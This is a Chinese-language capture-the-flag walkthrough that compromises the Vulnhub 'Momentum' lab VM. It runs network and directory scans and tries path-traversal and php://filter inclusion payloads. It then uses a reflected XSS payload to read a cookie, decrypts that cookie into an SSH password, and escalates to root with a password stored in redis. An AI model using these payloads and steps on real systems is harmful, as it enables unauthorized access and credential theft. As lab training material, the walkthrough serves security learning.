Momentum
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:75:2a:10 1 60 PCS Systemtechnik GmbH
192.168.56.137 08:00:27:80:8e:c9 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.137
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.137 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-27 21:15 EST
Nmap scan report for bogon (192.168.56.137)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5c:8e:2c:cc:c1:b0:3e:7c:0e:22:34:d8:60:31:4e:62 (RSA)
| 256 81:fd:c6:4c:5a:50:0a:27:ea:83:38:64:b9:8b:bd:c1 (ECDSA)
|_ 256 c1:8f:87:c1:52:09:27:60:5f:2e:2d:e0:08:03:72:c8 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Momentum | Index
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:80:8E:C9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.76 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
接下来的信息收集主要围绕着80端口展开,浏览器访问该端口,页面中有4张图片,将他们下载到Kali Linux本地:
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ ls
a.jpg b.jpg c.jpg d.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ ls
a.jpg b.jpg c.jpg d.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ exiftool a.jpg
ExifTool Version Number : 12.44
File Name : a.jpg
Directory : .
File Size : 501 kB
File Modification Date/Time : 2022:12:27 21:18:06-05:00
File Access Date/Time : 2022:12:27 21:18:06-05:00
File Inode Change Date/Time : 2022:12:27 21:18:06-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 1920
Image Height : 1080
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1920x1080
Megapixels : 2.1
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ steghide extract -sf a.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ stegseek a.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.85% (133.2 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ binwalk -e a.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
有理由相信从4张图片不能提取更多信息了。
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ curl http://192.168.56.137/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.137 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ nikto -h http://192.168.56.137
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.137
+ Target Hostname: 192.168.56.137
+ Target Port: 80
+ Start Time: 2022-12-27 21:22:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7d1, size: 5c086352f5b80, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2022-12-27 21:23:12 (GMT-5) (68 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)? n
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/12/27 21:23:46 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/server-status (Status: 403) [Size: 279]
Progress: 218055 / 220561 (98.86%)===============================================================
2022/12/27 21:24:23 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2022/12/27 21:26:08 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 2001]
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1323086 / 1323366 (99.98%)===============================================================
2022/12/27 21:30:25 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2022/12/27 21:31:32 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html (Status: 200) [Size: 2001]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
Progress: 848352 / 850254 (99.78%)===============================================================
2022/12/27 21:34:17 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.sh,.js,.txt
Completing file
AdobeCQ-AEM.txt local-ports.txt
AdobeXML.fuzz.txt Logins.fuzz.txt
aem2.txt LotusNotes.fuzz.txt
Apache.fuzz.txt netware.txt
ApacheTomcat.fuzz.txt nginx.txt
apache.txt oauth-oidc-scopes.txt
api/ Oracle9i.fuzz.txt
axis.txt OracleAppServer.fuzz.txt
big.txt Oracle-EBS-wordlist.txt
burp-parameter-names.txt oracle.txt
BurpSuite-ParamMiner/ Passwords.fuzz.txt
CGI-HTTP-POST.fuzz.txt PHP.fuzz.txt
CGI-HTTP-POST-Windows.fuzz.txt proxy-conf.fuzz.txt
CGI-Microsoft.fuzz.txt Public-Source-Repo-Issues.json
CGIs.txt quickhits.txt
CGI-XPlatform.fuzz.txt raft-large-directories-lowercase.txt
CMS/ raft-large-directories.txt
coldfusion.txt raft-large-extensions-lowercase.txt
combined_directories.txt raft-large-extensions.txt
combined_words.txt raft-large-files-lowercase.txt
common-and-dutch.txt raft-large-files.txt
common-and-french.txt raft-large-words-lowercase.txt
common-and-italian.txt raft-large-words.txt
common-and-portuguese.txt raft-medium-directories-lowercase.txt
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2022/12/27 21:34:44 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.js (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess.sh (Status: 403) [Size: 279]
/.htpasswd.js (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htpasswd.sh (Status: 403) [Size: 279]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html (Status: 200) [Size: 2001]
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status (Status: 403) [Size: 279]
Progress: 120416 / 122862 (98.01%)===============================================================
2022/12/27 21:35:05 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.sh,.js,.txt
Completing file
AdobeCQ-AEM.txt local-ports.txt
AdobeXML.fuzz.txt Logins.fuzz.txt
aem2.txt LotusNotes.fuzz.txt
Apache.fuzz.txt netware.txt
ApacheTomcat.fuzz.txt nginx.txt
apache.txt oauth-oidc-scopes.txt
api/ Oracle9i.fuzz.txt
axis.txt OracleAppServer.fuzz.txt
big.txt Oracle-EBS-wordlist.txt
burp-parameter-names.txt oracle.txt
BurpSuite-ParamMiner/ Passwords.fuzz.txt
CGI-HTTP-POST.fuzz.txt PHP.fuzz.txt
CGI-HTTP-POST-Windows.fuzz.txt proxy-conf.fuzz.txt
CGI-Microsoft.fuzz.txt Public-Source-Repo-Issues.json
CGIs.txt quickhits.txt
CGI-XPlatform.fuzz.txt raft-large-directories-lowercase.txt
CMS/ raft-large-directories.txt
coldfusion.txt raft-large-extensions-lowercase.txt
combined_directories.txt raft-large-extensions.txt
combined_words.txt raft-large-files-lowercase.txt
common-and-dutch.txt raft-large-files.txt
common-and-french.txt raft-large-words-lowercase.txt
common-and-italian.txt raft-large-words.txt
common-and-portuguese.txt raft-medium-directories-lowercase.txt
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2022/12/27 21:35:35 Starting gobuster in directory enumeration mode
===============================================================
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html (Status: 200) [Size: 2001]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 135449 / 373710 (36.24%)[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.txt": net/url: invalid control character in URL
Progress: 143081 / 373710 (38.29%)[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.txt": net/url: invalid control character in URL
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 2001]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 372828 / 373710 (99.76%)===============================================================
2022/12/27 21:36:46 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,sh,js,txt
[+] Timeout: 10s
===============================================================
2022/12/27 21:37:06 Starting gobuster in directory enumeration mode
===============================================================
/js (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html (Status: 200) [Size: 2001]
/manual (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 134643 / 180006 (74.80%)[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.txt": net/url: invalid control character in URL
Progress: 143139 / 180006 (79.52%)[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.sh": net/url: invalid control character in URL
Progress: 179448 / 180006 (99.69%)===============================================================
2022/12/27 21:37:49 Finished
===============================================================
至此没有扫描到任何有价值的目录或者文件,回过头来看首页,点开图片,注意以下url:
http://192.168.56.137/opus-details.php?id=visor
会不会有文件包含漏洞?
但是访问
http://192.168.56.137/opus-details.php?id=../../../../../../etc/passwd
只返回字符串/etc/passwd文本,因此可能有过滤机制
尝试php filter bypass:
http://192.168.56.137/opus-details.php?id=php://filter/convert.base64-encode/resource=opus-details
但是仍然没有返回
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ curl http://192.168.56.137/js/main.js
function viewDetails(str) {
window.location.href = "opus-details.php?id="+str;
}
/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/
在网页浏览中我们常常涉及到用户登录,登录完毕之后服务端会返回一个cookie值。这个cookie值相当于一个令牌,拿着这张令牌就等同于证明了你是某个用户。
如果你的cookie值被窃取,那么攻击者很可能能够直接利用你的这张令牌不用密码就登录你的账户。如果想要通过script脚本获得当前页面的cookie值,通常会用到document.cookie。
构造url获取cookie值:
http://192.168.56.137/opus-details.php?id=%3Cscript%3Ealert(document.cookie);%3C/script%3E
从而获得cookie值:
cookie=U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt
而从js文件知道该值是经过AES加密,并且密码是: SecretPassphraseMomentum
用AES 在线网站解密:
auxerre-alienum##
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ ssh [email protected]
The authenticity of host '192.168.56.137 (192.168.56.137)' can't be established.
ED25519 key fingerprint is SHA256:NLUFYImFHvyED76cAzjnxD3dTxP5rzmEHrx4acGvM9c.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.137' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux Momentum 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 08:47:31 2021
auxerre@Momentum:~$ id
uid=1000(auxerre) gid=1000(auxerre) groups=1000(auxerre),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
auxerre@Momentum:~$ sudo -l
-bash: sudo: command not found
auxerre@Momentum:~$ ls -alh
total 28K
drwxr-xr-x 3 auxerre auxerre 4.0K Apr 22 2021 .
drwxr-xr-x 3 root root 4.0K Apr 19 2021 ..
-rw------- 1 auxerre auxerre 0 Apr 22 2021 .bash_history
-rw-r--r-- 1 auxerre auxerre 220 Apr 19 2021 .bash_logout
-rw-r--r-- 1 auxerre auxerre 3.5K Apr 19 2021 .bashrc
-rw-r--r-- 1 auxerre auxerre 807 Apr 19 2021 .profile
drwx------ 2 auxerre auxerre 4.0K Apr 21 2021 .ssh
-rwx------ 1 auxerre auxerre 146 Apr 22 2021 user.txt
auxerre@Momentum:~$ cat user.txt
[ Momentum - User Owned ]
---------------------------------------
flag : 84157165c30ad34d18945b647ec7f647
---------------------------------------
auxerre@Momentum:~$ cat .bash_history
提权
上传linpeas.sh脚本到目标主机/tmp目录,修改权限,并执行脚本,从输出结果得知目标主机运行6379即redis
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp LISTEN 0 128 127.0.0.1:6379 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 [::1]:6379 [::]:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
auxerre@Momentum:/tmp$ redis-cli
127.0.0.1:6379> keys *
1) "rootpass"
127.0.0.1:6379> get rootpass
"m0mentum-al1enum##"
127.0.0.1:6379> exit
auxerre@Momentum:/tmp$ su - root
Password:
root@Momentum:~# cd /root
root@Momentum:~# ls -alh
total 24K
drwx------ 3 root root 4.0K Apr 22 2021 .
drwxr-xr-x 18 root root 4.0K Apr 19 2021 ..
-rw------- 1 root root 0 Apr 22 2021 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Apr 21 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwx------ 1 root root 162 Apr 22 2021 root.txt
root@Momentum:~# cat root.txt
[ Momentum - Rooted ]
---------------------------------------
Flag : 658ff660fdac0b079ea78238e5996e40
---------------------------------------
by alienum with <3
root@Momentum:~#
经验教训
- 在看到url的特点,认为有本地文件包含漏洞时,但是经过尝试,包括使用Php filter函数都没有能够得到相应的结果,此时测试过程中应当注意返回的结果:并不是不存在,或者为空,因此这里面必有奥妙存在,然后查看js代码,发现是js代码在执行.